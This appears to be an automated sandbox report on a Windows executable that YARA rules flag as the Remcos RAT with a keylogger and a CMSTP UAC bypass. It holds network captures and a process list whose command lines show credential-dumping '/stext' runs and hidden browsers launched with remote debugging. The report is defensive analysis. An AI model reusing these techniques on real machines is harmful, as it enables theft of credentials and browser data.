                                                                                                                                                                                                                                                                                                                            Akamai-Request-BC: [a=23.210.4.153,b=2376667769,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                                                                                            Server-Timing: clientrtt; dur=2, clienttt; dur=1, origin; dur=0, cdntime; dur=1, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                                                                            Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                                            Akamai-Server-IP: 23.210.4.153
                                                                                                                                                                                                                                                                                                                            Akamai-Request-ID: 8da91279
                                                                                                                                                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                            report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                                                                            nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                                                                            Cache-Control: public, no-transform, max-age=31535892
                                                                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                            Akamai-GRN: 0.9904d217.1736062766.8da91279
                                                                                                                                                                                                                                                                                                                            Vary: Origin


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                            9192.168.2.64987123.209.72.74437232C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC629OUTGET /bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                            Host: assets.msn.com
                                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                            Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-05 07:39:26 UTC | 1238 | IN | HTTP/1.1 200 OK
Content-Type: application/javascript
Content-MD5: uNgSH4TlVfgPvcJyj5sBtQ==
Last-Modified: Sat, 21 Dec 2024 00:40:16 GMT
ETag: 0x8DD215809D888F7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d43c0189-901e-0074-788b-576eef000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 05 Jan 2025 07:39:26 GMT
Transfer-Encoding: chunked
Connection: close
Connection: Transfer-Encoding
Alt-Svc: h3=":443"; ma=86400
Akamai-Request-BC: [a=23.210.4.135,b=2686428991,c=g,n=US_NJ_SECAUCUS,o=20940]
Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
Akamai-Cache-Status: Hit from child
Akamai-Server-IP: 23.210.4.135
Akamai-Request-ID: a01fa73f
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
Cache-Control: public, no-transform, max-age=31535892
Timing-Allow-Origin: *
Akamai-GRN: 0.8704d217.1736062766.a01fa73f
Vary: Origin


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                            10192.168.2.64987223.209.72.74437232C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC626OUTGET /bundles/v1/edgeChromium/latest/common.2ab67b7067792da4ff61.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                            Host: assets.msn.com
                                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                            Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-05 07:39:26 UTC | 1238 | IN | HTTP/1.1 200 OK
Content-Type: application/javascript
Content-MD5: mnSxx044ngd8b1v/JLTBCA==
Last-Modified: Fri, 03 Jan 2025 21:01:15 GMT
ETag: 0x8DD2C39C2E90AC3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 59695666-801e-0055-2c22-5eabf6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 05 Jan 2025 07:39:26 GMT
Transfer-Encoding: chunked
Connection: close
Connection: Transfer-Encoding
Alt-Svc: h3=":443"; ma=86400
Akamai-Request-BC: [a=23.210.4.171,b=2172968801,c=g,n=US_NJ_SECAUCUS,o=20940]
Server-Timing: clientrtt; dur=2, clienttt; dur=1, origin; dur=0, cdntime; dur=1, wpo;dur=0,1s;dur=0
Akamai-Cache-Status: Hit from child
Akamai-Server-IP: 23.210.4.171
Akamai-Request-ID: 8184df61
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
Cache-Control: public, no-transform, max-age=31535892
Timing-Allow-Origin: *
Akamai-GRN: 0.ab04d217.1736062766.8184df61
Vary: Origin


Session ID | Source IP | Source Port | Destination IP | Destination Port
11 | 192.168.2.6 | 50011 | 40.113.110.67 | 443

Timestamp | Bytes transferred | Direction | Data
2025-01-05 07:39:44 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: 5IEve9Eekk+EHtgQ.1Context: 4831965ea1f29014
2025-01-05 07:39:44 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-05 07:39:44 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 5IEve9Eekk+EHtgQ.2Context: 4831965ea1f29014<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis
2025-01-05 07:39:44 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: 5IEve9Eekk+EHtgQ.3Context: 4831965ea1f29014<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-05 07:39:45 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2025-01-05 07:39:45 UTC | 58 | IN | Data Ascii: MS-CV: ZSiRKiLEMkKkTyWEO1/EcQ.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
12 | 192.168.2.6 | 50069 | 40.113.110.67 | 443

Timestamp | Bytes transferred | Direction | Data
2025-01-05 07:40:09 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: qFbAsiDpd0uE8l4o.1Context: 9642331db317a31a
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:09 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:09 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 71 46 62 41 73 69 44 70 64 30 75 45 38 6c 34 6f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 36 34 32 33 33 31 64 62 33 31 37 61 33 31 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 77 54 61 72 59 33 54 42 4f 31 49 66 75 66 6c 35 59 31 63 50 6b 47 50 36 38 74 52 72 2f 6c 41 74 6f 68 31 61 64 61 2b 58 36 6e 5a 52 4c 37 6b 33 57 78 42 77 52 74 6a 68 6d 30 31 4f 70 48 6e 48 41 31 4c 73 46 53 46 65 63 54 67 42 66 58 72 78 41 56 32 58 36 76 78 72 47 7a 46 2f 6c 58 71 6f 62 46 35 66 66 44 70 6b 72 50 69 73
                                                                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: qFbAsiDpd0uE8l4o.2Context: 9642331db317a31a<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:09 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 71 46 62 41 73 69 44 70 64 30 75 45 38 6c 34 6f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 36 34 32 33 33 31 64 62 33 31 37 61 33 31 61 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: qFbAsiDpd0uE8l4o.3Context: 9642331db317a31a<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:10 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:10 UTC58INData Raw: 4d 53 2d 43 56 3a 20 53 71 50 46 74 2b 41 42 54 55 4b 78 51 43 49 7a 70 2f 4a 4e 65 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: SqPFt+ABTUKxQCIzp/JNeg.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
13 | 192.168.2.6 | 50070 | 40.113.110.67 | 443

Timestamp | Bytes transferred | Direction | Data
2025-01-05 07:40:35 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: EU7Bh0nEGU27v6oh.1Context: 6c9a74a0b594ccd8
2025-01-05 07:40:35 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-05 07:40:35 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: EU7Bh0nEGU27v6oh.2Context: 6c9a74a0b594ccd8<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis
2025-01-05 07:40:35 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: EU7Bh0nEGU27v6oh.3Context: 6c9a74a0b594ccd8<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-05 07:40:35 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2025-01-05 07:40:35 UTC | 58 | IN | Data Ascii: MS-CV: +k07UTKHmkqZRQKK5UHenA.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
14 | 192.168.2.6 | 50071 | 40.113.110.67 | 443

Timestamp | Bytes transferred | Direction | Data
2025-01-05 07:41:06 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: zT1cj5ob3UycrYXx.1Context: 7bfae41fdb5b0fb1
2025-01-05 07:41:06 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-05 07:41:06 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: zT1cj5ob3UycrYXx.2Context: 7bfae41fdb5b0fb1<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis
2025-01-05 07:41:06 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: zT1cj5ob3UycrYXx.3Context: 7bfae41fdb5b0fb1<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-05 07:41:06 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2025-01-05 07:41:06 UTC | 58 | IN | Data Ascii: MS-CV: Xmg+kzsFEECF8C1q3l26Ag.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
15 | 192.168.2.6 | 50072 | 40.113.110.67 | 443

Timestamp | Bytes transferred | Direction | Data
2025-01-05 07:41:44 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: HIG8fy+AN0GuBnpv.1Context: ab541f67788d8e04
2025-01-05 07:41:44 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-05 07:41:44 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: HIG8fy+AN0GuBnpv.2Context: ab541f67788d8e04<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis
2025-01-05 07:41:44 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: HIG8fy+AN0GuBnpv.3Context: ab541f67788d8e04<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-05 07:41:44 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2025-01-05 07:41:44 UTC | 58 | IN | Data Ascii: MS-CV: V0PkJ0ia/EiUn6/Ncm0Qzg.0Payload parsing failed.


Session ID:16
Source IP:192.168.2.6
Source Port:50073
Destination IP:40.113.110.67
Destination Port:443


Target ID:0
Start time:02:38:59
Start date:05/01/2025
Path:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe"
Imagebase:0x400000
File size:493'056 bytes
MD5 hash:41496241AE1AD7C561D749F7D479CAFF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4568387682.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:low
Has exited:false

Target ID:3
Start time:02:39:02
Start date:05/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:--user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
Imagebase:0x7ff684c40000
File size:3'242'272 bytes
MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:02:39:03
Start date:05/01/2025
Path:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\djdxhsukiioozpxia"
Imagebase:0x400000
File size:493'056 bytes
MD5 hash:41496241AE1AD7C561D749F7D479CAFF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:low
Has exited:true

Target ID:5
Start time:02:39:03
Start date:05/01/2025
Path:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\fliqhlfdwqgtkvturvhs"
Imagebase:0x400000
File size:493'056 bytes
MD5 hash:41496241AE1AD7C561D749F7D479CAFF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:low
Has exited:true

Target ID:6
Start time:02:39:03
Start date:05/01/2025
Path:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\qgniidqfkyyfmjhyagcumhn"
Imagebase:0x400000
File size:493'056 bytes
MD5 hash:41496241AE1AD7C561D749F7D479CAFF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:low
Has exited:true

Target ID:8
Start time:02:39:08
Start date:05/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2028,i,10613890657641571661,3142487454969879835,262144 /prefetch:8
Imagebase:0x7ff684c40000
File size:3'242'272 bytes
MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:02:39:13
Start date:05/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:--user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:10
Start time:02:39:14
Start date:05/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1984,i,1963966134464730034,17582007813680057049,262144 /prefetch:3
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:11
Start time:02:39:14
Start date:05/01/2025
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                                                                                                            Start time:02:39:15
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
